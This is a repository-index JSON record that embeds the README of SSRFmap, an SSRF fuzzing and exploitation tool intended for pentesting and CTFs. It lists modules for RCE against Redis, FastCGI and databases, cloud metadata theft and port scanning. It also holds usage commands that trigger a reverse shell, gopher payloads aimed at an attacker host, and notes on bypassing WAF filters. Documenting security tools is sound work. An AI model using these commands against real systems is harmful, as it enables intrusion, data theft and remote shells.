{"id":13538892,"url":"https://github.com/swisskyrepo/ssrfmap","last_synced_at":"2025-04-23T21:03:21.651Z","repository":{"id":41458022,"uuid":"153167583","full_name":"swisskyrepo/SSRFmap","owner":"swisskyrepo","description":"Automatic SSRF fuzzer and exploitation tool","archived":false,"fork":false,"pushed_at":"2025-02-26T19:39:06.000Z","size":4484,"stargazers_count":3169,"open_issues_count":6,"forks_count":538,"subscribers_count":57,"default_branch":"master","last_synced_at":"2025-04-23T21:03:12.303Z","etag":null,"topics":["ctf","exploitation","hacktoberfest","pentest","server-side-request-forgery","ssrf","ssrfmap","vulnerability"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/swisskyrepo.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":"swisskyrepo","ko_fi":"swissky","custom":"https://www.buymeacoffee.com/swissky"}},"created_at":"2018-10-15T19:08:26.000Z","updated_at":"2025-04-23T11:13:11.000Z","dependencies_parsed_at":"2022-08-10T02:27:15.312Z","dependency_job_id":"c34f9688-f5ba-4f5f-bd8b-5c8f2bf650b3","html_url":"https://github.com/swisskyrepo/SSRFmap","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/swisskyrepo%2FSSRFmap","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/swisskyrepo%2FSSRFmap/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/swisskyrepo%2FSSRFmap/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/swisskyrepo%2FSSRFmap/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/swisskyrepo","download_url":"https://codeload.github.com/swisskyrepo/SSRFmap/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":250514781,"owners_count":21443209,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ctf","exploitation","hacktoberfest","pentest","server-side-request-forgery","ssrf","ssrfmap","vulnerability"],"created_at":"2024-08-01T09:01:17.404Z","updated_at":"2025-04-23T21:03:21.632Z","avatar_url":"https://github.com/swisskyrepo.png","language":"Python","funding_links":["https://github.com/sponsors/swisskyrepo","https://ko-fi.com/swissky","https://www.buymeacoffee.com/swissky"],"categories":["\u003ca id=\"683b645c2162a1fce5f24ac2abfa1973\"\u003e\u003c/a\u003e漏洞\u0026\u0026漏洞管理\u0026\u0026漏洞发现/挖掘\u0026\u0026漏洞开发\u0026\u0026漏洞利用\u0026\u0026Fuzzing"],"sub_categories":["功能"],"readme":"# SSRFmap [![Python 3.4+](https://img.shields.io/badge/python-3.4+-blue.svg)](https://www.python.org/downloads/release/python-360/) [![Rawsec's CyberSecurity Inventory](https://inventory.raw.pm/img/badges/Rawsec-inventoried-FF5050_flat.svg)](https://inventory.raw.pm/)\n\n\nSSRF are often used to leverage actions on other services, this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.\n\n\u003e Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.\n\n## Summary\n\n* [Modules](#modules)\n* [Install and Manual](#install-and-manual)\n* [Examples](#examples)\n* [SSRFmap - Tests](#ssrfmap-tests)\n* [Contribute](#contribute)\n * [Contributors](#thanks-to-the-contributors)\n\n\n## Modules\n\nThe following modules are already implemented and can be used with the `-m` argument.\n\n| Name | Description |\n| :------------- | :------------------------------------------------------- |\n| `axfr` | DNS zone transfers (AXFR) |\n| `fastcgi` | FastCGI RCE |\n| `redis` | Redis RCE |\n| `github` | Github Enterprise RCE \u003c 2.8.7 |\n| `zabbix` | Zabbix RCE |\n| `mysql` | MySQL Command execution |\n| `postgres` | Postgres Command execution |\n| `docker` | Docker Infoleaks via API |\n| `smtp` | SMTP send mail |\n| `portscan` | Scan top 8000 ports for the host |\n| `networkscan` | HTTP Ping sweep over the network |\n| `readfiles` | Read files such as `/etc/passwd` |\n| `alibaba` | Read files from the provider (e.g: meta-data, user-data) |\n| `aws` | Read files from the provider (e.g: meta-data, user-data) |\n| `gce` | Read files from the provider (e.g: meta-data, user-data) |\n| `digitalocean` | Read files from the provider (e.g: meta-data, user-data) |\n| `socksproxy` | SOCKS4 Proxy |\n| `smbhash` | Force an SMB authentication via a UNC Path |\n| `tomcat` | Bruteforce attack against Tomcat Manager |\n| `custom` | Send custom data to a listening service, e.g: netcat |\n| `memcache` | Store data inside the memcache instance |\n\n\n## Install and Manual\n\n* From the Github repository.\n ```powershell\n $ git clone https://github.com/swisskyrepo/SSRFmap\n $ cd SSRFmap/\n $ pip3 install -r requirements.txt\n $ python3 ssrfmap.py\n\n usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]\n [-v [VERBOSE]] [--lhost LHOST] [--lport LPORT]\n [--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]]\n\n optional arguments:\n -h, --help show this help message and exit\n -r REQFILE SSRF Request file\n -p PARAM SSRF Parameter to target\n -m MODULES SSRF Modules to enable\n -l HANDLER Start an handler for a reverse shell\n -v [VERBOSE] Enable verbosity\n --lhost LHOST LHOST reverse shell or IP to target in the network\n --lport LPORT LPORT reverse shell or port to target in the network\n --uagent USERAGENT User Agent to use\n --ssl [SSL] Use HTTPS without verification\n --proxy PROXY Use HTTP(s) proxy (ex: http://localhost:8080)\n --level [LEVEL] Level of test to perform (1-5, default: 1)\n ```\n\n* Docker\n ```powershell\n $ git clone https://github.com/swisskyrepo/SSRFmap\n $ docker build --no-cache -t ssrfmap .\n $ docker run -it ssrfmap ssrfmap.py [OPTIONS] \n $ docker run -it -v $(pwd):/usr/src/app ssrfmap ssrfmap.py\n ```\n\n\n## Examples\n\nFirst you need a request with a parameter to fuzz, Burp requests works well with SSRFmap. \nThey should look like the following. More examples are available in the **./examples** folder.\n\n```powershell\nPOST /ssrf HTTP/1.1\nHost: 127.0.0.1:5000\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://mysimple.ssrf/\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 31\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nurl=https%3A%2F%2Fwww.google.fr\n```\n\nUse the `-m` followed by module name (separated by a `,` if you want to launch several modules).\n\n```powershell\n# Launch a portscan on localhost and read default files\npython ssrfmap.py -r examples/request.txt -p url -m readfiles,portscan\n```\n\nIf you want to inject inside a header, a GET or a POST parameter, you only need to specify the parameter name\n\n```powershell\npython ssrfmap.py -r examples/request6.txt -p X-Custom-Header -m readfiles --rfiles /tmp/test\n```\n\nIf you need to have a custom user-agent use the `--uagent`. Some targets will use HTTPS, you can enable it with `--ssl`.\n\n```powershell\n# Launch a portscan against an HTTPS endpoint using a custom user-agent\npython ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent \"SSRFmapAgent\"\n```\n\nSome modules allow you to create a connect back, you have to specify `LHOST` and `LPORT`. Also SSRFmap can listen for the incoming reverse shell.\n\n```powershell\n# Triggering a reverse shell on a Redis\npython ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242\n\n# -l create a listener for reverse shell on the specified port\n# --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload\n```\n\nWhen the target is protected by a WAF or some filters you can try a wide range of payloads and encoding with the parameter `--level`.\n\n```powershell\n# --level : ability to tweak payloads in order to bypass some IDS/WAF. e.g: 127.0.0.1 -\u003e [::] -\u003e 0000: -\u003e ...\n```\n\n## SSRFmap Tests\n\nA quick way to test the framework can be done with `data/example.py` SSRF service.\n\n* Local\n ```powershell\n FLASK_APP=examples/example.py flask run \u0026\n python ssrfmap.py -r examples/request.txt -p url -m readfiles\n ```\n\n* Docker\n ```ps1\n docker build --no-cache -t ssrfmap .\n\n # run example ssrf http service\n docker run -it -v \"$(pwd)\":/usr/src/app -p 5000:5000 ssrfmap examples/example.py\n\n # run example ssrf dns service\n docker exec -u root:root -it example python examples/ssrf_dns.py\n\n # run ssrfmap tool\n docker exec -it example python ssrfmap.py -r examples/request.txt -p url -m readfiles\n ```\n\nLaunch the tests requests:\n\n```ps1\ndocker exec -it example python ssrfmap.py -r examples/request.txt -p url -m readfiles --rfiles /etc/issue\ndocker exec -it example python ssrfmap.py -r examples/request2.txt -p url -m readfiles --rfiles /etc/issue\ndocker exec -it example python ssrfmap.py -r examples/request3.txt -p url -m readfiles --rfiles /etc/issue\ndocker exec -it example python ssrfmap.py -r examples/request4.txt -p url -m readfiles --rfiles /etc/issue\ndocker exec -it example python ssrfmap.py -r examples/request5.txt -p url -m readfiles --rfiles /etc/issue\ndocker exec -it example python ssrfmap.py -r examples/request6.txt -p X-Custom-Header -m readfiles --rfiles /etc/issue\ndocker exec -it example python ssrfmap.py -r examples/request.txt -p url -m axfr\ndocker exec -it example python ssrfmap.py -r examples/request3.txt -p url -m axfr --lhost 127.0.0.1 --lport 53 --ldomain example.lab\n```\n\n\n## Contribute\n\nI :heart: pull requests :)\nFeel free to add any feature listed below or a new service.\n - Redis PHP Exploitation \n - HTTP module (Jenkins ?)\n ```powershell\n gopher://\u003cproxyserver\u003e:8080/_GET http://\u003cattacker:80\u003e/x HTTP/1.1%0A%0A\n gopher://\u003cproxyserver\u003e:8080/_POST%20http://\u003cattacker\u003e:80/x%20HTTP/1.1%0ACookie:%20eatme%0A%0AI+am+a+post+body\n ```\n\nThe following code is a template if you wish to add a module interacting with a service.\n\n```python\nfrom core.utils import *\nimport logging\n\nname = \"servicename in lowercase\"\ndescription = \"ServiceName RCE - What does it do\"\nauthor = \"Name or pseudo of the author\"\ndocumentation = [\"http://link_to_a_research\", \"http://another_link\"]\n\nclass exploit():\n SERVER_HOST = \"127.0.0.1\"\n SERVER_PORT = \"4242\"\n\n def __init__(self, requester, args):\n logging.info(\"Module '{}' launched !\".format(name))\n\n # Handle args for reverse shell\n if args.lhost == None: self.SERVER_HOST = input(\"Server Host:\")\n else: self.SERVER_HOST = args.lhost\n\n if args.lport == None: self.SERVER_PORT = input(\"Server Port:\")\n else: self.SERVER_PORT = args.lport\n\n # Data for the service\n # Using a generator to create the host list\n # Edit the following ip if you need to target something else\n gen_host = gen_ip_list(\"127.0.0.1\", args.level)\n for ip in gen_host:\n port = \"6379\"\n data = \"*1%0d%0a$8%0d%0aflus[...]%0aquit%0d%0a\"\n payload = wrapper_gopher(data, ip , port)\n\n # Handle args for reverse shell\n payload = payload.replace(\"SERVER_HOST\", self.SERVER_HOST)\n payload = payload.replace(\"SERVER_PORT\", self.SERVER_PORT)\n\n # Send the payload\n r = requester.do_request(args.param, payload)\n```\n\nYou can also contribute with a beer IRL or via Github Sponsor button.\n\n### Thanks to the contributors\n\n\u003cp align=\"center\"\u003e\n\u003ca href=\"https://github.com/swisskyrepo/SSRFmap/graphs/contributors\"\u003e\n \u003cimg src=\"https://contrib.rocks/image?repo=swisskyrepo/SSRFmap\u0026max=36\"\u003e\n\u003c/a\u003e\n\u003c/p\u003e\n\n\n## Inspired by\n\n- [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! - Orange Tsai](https://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)\n- [Blog on Gopherus Tool -SpyD3r](https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/)\n- [Gopherus - Github](https://github.com/tarunkant/Gopherus)\n- [SSRF testing - cujanovic](https://github.com/cujanovic/SSRF-Testing)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fswisskyrepo%2Fssrfmap","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fswisskyrepo%2Fssrfmap","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fswisskyrepo%2Fssrfmap/lists"}